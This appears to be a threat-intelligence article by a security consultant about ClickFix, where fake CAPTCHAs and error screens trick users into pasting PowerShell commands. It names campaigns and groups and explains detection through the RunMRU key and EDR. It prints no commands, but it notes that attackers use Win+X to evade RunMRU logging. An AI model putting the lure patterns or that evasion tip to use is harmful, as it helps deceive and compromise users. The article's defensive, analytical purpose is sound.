The ClickFix technique established itself in 2025 as a dominant attack method, adopted by a wide range of malicious actors—from financially motivated cybercriminals to state-backed groups—for several reasons: minimal technical investment, high reusability of kits, and advanced automation in producing malicious pages maximize returns per campaign.
By leveraging familiar interfaces (CAPTCHAs, update screens, fake security pages) and relying on actions performed by the user themselves, ClickFix bypasses part of traditional defensive controls and improves the conversion rate of attacks into actual system access, making it an especially attractive vector within an industrialized cybercrime marketplace.
Social engineering and ClickFix: active manipulation of users
This social engineering method aims to deceive the user into executing malicious commands themselves, exploiting trust or the desire to resolve an apparent technical problem, often via fake CAPTCHAs or supposed security verifications.
The operation begins with a decoy phase scattered through phishing campaigns, malvertising, or compromised legitimate sites. The victim is directed to a page controlled by the attacker where, under a false pretext, they are prompted to copy-paste a command into a system tool such as PowerShell or the terminal, notably via Win+R.
The user, convinced they are performing a legitimate action, actually triggers the infection of their machine. The method’s effectiveness lies in its ability to bypass traditional technical defenses by exploiting the victim’s trust and active participation, turning the human into the execution link rather than a security barrier.
One of the most notable campaigns observed in 2025, dubbed PHALT#BLYX and identified by Securonix analysts, highlights ClickFix being exploited at the heart of an operation specifically targeting hotel industry organizations.
This campaign used deceptive visuals such as fake CAPTCHAs and fake system errors (BSODs) to prompt victims to manually run a PowerShell command. The attack scenario relied on counterfeit hotel reservation cancellation notices simulating a processing spike, redirecting victims to a clone of an online booking site that faithfully imitated the original.
The infection culminated in the installation of a remote access tool (RAT), granting attackers full control over the compromised system. The attackers frequently anchor their campaigns in strategic timeframes, exploiting peak activity periods to maximize impact. The operation is said to have begun several months before the year-end holidays of 2025, a period especially favorable for fraud targeting the tourism sector.
From cybercrime to information warfare: a common tool
This technique is now spreading widely, testifying to its effectiveness and versatility. It is deployed by both financially motivated cybercriminals seeking to maximize their financial gains and by state-sponsored groups pursuing strategic objectives, whether espionage, gathering sensitive information, or disrupting targeted infrastructures.
● The North Korean Lazarus group used this technique in its “ClickFake Interview” campaign to exfiltrate cryptocurrency, targeting FinTech professionals with fake job offers. The attack aimed to deploy the GolangGhost backdoor.
● The Interlock ransomware group has integrated ClickFix into its arsenal to distribute info-stealers such as LummaStealer and BerserkStealer ahead of deploying its ransomware, using lures of fake browser or application updates.
● Various cybercriminal actors are using ClickFix to distribute a wide range of malware, including info-stealers Lumma Stealer and Lampion, RATs AsyncRAT and NetSupport RAT, and loaders MintsLoader and Latrodectus. The method’s success has even led to the commercialization of “ClickFix” kits on illicit forums since the end of 2024.
● State-sponsored groups such as TA427 (Kimsuky) and TA450 (MuddyWater) are also suspected of using this technique for espionage purposes.
In terms of detection and forensic analysis, ClickFix-based attacks nevertheless leave technical traces that can be exploited. When a user runs a command from the Run dialog (Win+R), it is recorded in a specific area of the system—the RunMRU Registry key—allowing retrospective reconstruction of the entered commands and highlighting suspicious behavior.
Some attackers attempt to curb this visibility by using the Quick Access Menu (Win+X) to run their code, in order not to appear in that history.
This evasion attempt, however, is not entirely effective: careful analysis of Windows event logs, or the use of advanced security solutions such as EDR, can still identify the creation of unusual or suspicious processes. Taken together, these elements show that, despite the sophistication of the social engineering employed by ClickFix, the attack continues to generate exploitable artifacts that must be systematically integrated into investigative and detection practices.
*Lucien Chaya Podeur is a cybersecurity expert at XMCO
